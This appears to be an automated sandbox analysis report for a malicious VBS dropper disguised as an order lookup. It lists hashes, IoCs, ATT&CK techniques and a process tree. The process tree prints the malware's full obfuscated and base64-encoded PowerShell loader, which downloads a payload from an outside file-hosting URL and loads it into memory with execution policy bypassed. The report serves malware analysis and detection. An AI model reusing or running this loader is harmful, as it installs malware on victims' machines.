76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2

General

Target

Consulta de encomenda Nº TM06-Q2-11-24.vbs
Size

12KB
MD5

8a330624d5189d9bcd491d93c29624c4
SHA1

b89dd3334cd355360ae7e6f85a060dbe4de9d01d
SHA256

76cef289abc1b016df678ab28308da2373708a45d99528346409fcb809c813a2
SHA512

9af32c229db64bb133a39e7e3ec12dd269d971734fe2e46c61c0167696d6dc43c7ad274e7cbbcb0c41ac529a3ccdbb2a6e04ee1807cdfbe1dd3af11462016685
SSDEEP

96:khBZNNgct8LOgrf8x/JIcBkiYM1z9jRFtRQLNkOAhqL5s7n1muCweU:YBZNUOgrf6/JIcBkiYM1zbuLi7Aub

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	1032	WScript.exe
4	1032	WScript.exe
8	3008	powershell.exe
9	3008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3008	powershell.exe
2632	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2632	powershell.exe
3008	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1220 wrote to memory of 1032	1220	WScript.exe	30
PID 1220 wrote to memory of 1032	1220	WScript.exe	30
PID 1220 wrote to memory of 1032	1220	WScript.exe	30
PID 1032 wrote to memory of 2632	1032	WScript.exe	31
PID 1032 wrote to memory of 2632	1032	WScript.exe	31
PID 1032 wrote to memory of 2632	1032	WScript.exe	31
PID 2632 wrote to memory of 3008	2632	powershell.exe	33
PID 2632 wrote to memory of 3008	2632	powershell.exe	33
PID 2632 wrote to memory of 3008	2632	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Consulta de encomenda Nº TM06-Q2-11-24.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1220
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNoZUxMSURbMV0rJHNoRUxMSURbMTNdKydYJykgKCgnV0V3aW1hZ2VVcmwgPSBUb1JodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maScrJ2xlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0RycrJ3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzNXcmcGtfdicrJ2lkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MCcrJzRmIFRvUjtXRXd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQycrJ2xpZW50O1dFd2ltYWdlQnl0ZXMgPSBXRXd3ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKFdFd2ltYWdlVXJsKTtXRXdpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4JysnLicrJ0dldFN0cmluZyhXRXdpbWFnZUJ5dGVzKTtXRXdzdGFydEZsYWcgPScrJyBUb1I8JysnPEJBU0U2NF9TVEFSVD4+VG9SO1dFd2VuZEZsYWcgPSBUb1I8PEJBU0U2NF9FTkQ+PlRvUjtXRXdzdGFydEluZCcrJ2V4JysnID0gV0V3aScrJ21hZ2VUZXh0LkluJysnZGV4T2YoV0V3c3RhcnRGbGFnKTtXRXcnKydlJysnbmRJbmRleCA9IFdFd2ltYWdlVGV4dC5JbmRleE9mKFdFd2VuZEZsYWcpO1dFd3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXRXdlbmRJbmRleCAtZ3QgV0V3c3RhcnRJbmRleDtXRXdzdGFydEluZGV4ICs9IFdFd3N0YXJ0RmxhZy5MZW5ndGg7V0V3YicrJ2FzZTY0TGUnKyduZ3RoID0gV0V3ZW5kSW5kZXggLSBXRXdzdGFydEluZGV4O1dFd2Jhc2U2NENvbW1hbmQnKycgPSBXRXdpbWFnZVRleCcrJ3QuJysnU3Vic3RyaW5nKFdFd3N0YXJ0SW5kZXgsIFdFd2Jhc2U2NExlbmd0aCk7V0V3YmFzZTY0UmUnKyd2ZXJzZWQgPSAtam9pbiAnKycoV0V3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHRkdyBGb3JFYWNoLU9iamVjdCB7IFdFd18gfSlbLTEuLi0oV0V3YmFzZTY0Q29tbWFuZC5MZW5ndGgpXScrJztXRXdjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0JysnU3RyaW5nKFdFd2Jhc2U2NFJldmVyc2VkKTtXRXdsb2FkZWQnKydBJysnc3NlbWJseScrJyA9IFtTJysneXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYScrJ2QoV0V3Y29tbWFuZEJ5dCcrJ2VzKTtXRXd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKFRvUlZBSVRvUik7V0V3dmFpTWV0aG9kLkludm9rZShXRXdudWxsLCBAKFRvUnR4dC5kc3RlcC9wb3AvdWUucHJneGFteWdyZW5lLmdpZy8vOnB0dGhUb1IsIFRvUmRlc2F0aXZhZCcrJ29Ub1IsICcrJ1RvUmRlc2F0aXZhZG8nKydUb1IsIFRvUmRlc2F0aXZhZG9Ub1IsIFRvUmRlc2F0aScrJ3ZhZG9UJysnb1IsIFRvUjFUb1IsIFRvUmNvbG9yY3BsVG9SLCBUb1JkJysnZXNhdGl2YWRvVG9SLCBUb1JkZXNhdGl2YWRvVG9SLFRvUmRlJysnc2F0aXZhZG9Ub1IsVG9SZGVzYXRpdmFkb1RvUixUb1JkZXNhdGl2YWRvVG9SLFRvUjFUb1IsVG9SZGVzYScrJ3RpdmFkb1RvUiknKycpOycpLlJlUGxhY2UoJ3RkdycsW1NUckluZ11bQ0hBUl0xMjQpLlJlUGxhY2UoJ1RvUicsW1NUckluZ11bQ0hBUl0zOSkuUmVQbGFjZSgnV0V3JyxbU1RySW5nXVtDSEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sheLLID[1]+$shELLID[13]+'X') (('WEwimageUrl = ToRhttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStG'+'rnTICfFhmTKj3LC6SQtIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a090'+'4f ToR;WEwwebClient = New-Object System.Net.WebC'+'lient;WEwimageBytes = WEwwebClient'+'.DownloadData(WEwimageUrl);WEwimageText = [System.Text.Encoding]::UTF8'+'.'+'GetString(WEwimageBytes);WEwstartFlag ='+' ToR<'+'<BASE64_START>>ToR;WEwendFlag = ToR<<BASE64_END>>ToR;WEwstartInd'+'ex'+' = WEwi'+'mageText.In'+'dexOf(WEwstartFlag);WEw'+'e'+'ndIndex = WEwimageText.IndexOf(WEwendFlag);WEwstartIndex -ge 0 -and WEwendIndex -gt WEwstartIndex;WEwstartIndex += WEwstartFlag.Length;WEwb'+'ase64Le'+'ngth = WEwendIndex - WEwstartIndex;WEwbase64Command'+' = WEwimageTex'+'t.'+'Substring(WEwstartIndex, WEwbase64Length);WEwbase64Re'+'versed = -join '+'(WEwbase64Command.ToCharArray() tdw ForEach-Object { WEw_ })[-1..-(WEwbase64Command.Length)]'+';WEwcommandBytes = [System.Convert]::FromBase64'+'String(WEwbase64Reversed);WEwloaded'+'A'+'ssembly'+' = [S'+'ystem.Reflection.Assembly]::Loa'+'d(WEwcommandByt'+'es);WEwvaiMethod = [dnlib.IO.Home].GetMethod(ToRVAIToR);WEwvaiMethod.Invoke(WEwnull, @(ToRtxt.dstep/pop/ue.prgxamygrene.gig//:ptthToR, ToRdesativad'+'oToR, '+'ToRdesativado'+'ToR, ToRdesativadoToR, ToRdesati'+'vadoT'+'oR, ToR1ToR, ToRcolorcplToR, ToRd'+'esativadoToR, ToRdesativadoToR,ToRde'+'sativadoToR,ToRdesativadoToR,ToRdesativadoToR,ToR1ToR,ToRdesa'+'tivadoToR)'+');').RePlace('tdw',[STrIng][CHAR]124).RePlace('ToR',[STrIng][CHAR]39).RePlace('WEw',[STrIng][CHAR]36) )"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f48ff76b8ce389dafc8e1aa30c664a35

SHA1
789952d558f732c31c24ab0fd6447cf76e6cfa35

SHA256
d54d4c8800ce14712ab6800aa842eaa8631cc7fe74967cd3b5bdb7ea4d4ecd13

SHA512
6b4051e2a78364a50068cf67ab432f1b034c4d7ca11535ee280096ef7f16d573f392c0208868d372297f4d3d08c43f89875ed66c568f92701fa13d2b695b0fe2

Download Submit
C:\Users\Admin\AppData\Roaming\emksjAafCReiQSFZxSk.vbs

Filesize
1KB

MD5
c1ab9e3c7a5a70259e486e1b35e791dd

SHA1
f0f6ebff9ebfac13bf995bccf8193daf58827652

SHA256
6cc7e3be7d1abd44b8cd67b15cbc5c86ee366edc63da01e0b1b7544982551738

SHA512
9d705558cd936e603ae1db6860fa1f2a7337acf8df787ca1acb9a32c96d0345834b705aac1c503215127fefe01057bd789be276cc2a377dc29c856e0b78fd9d2

Download Submit
memory/2632-8-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2632-9-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing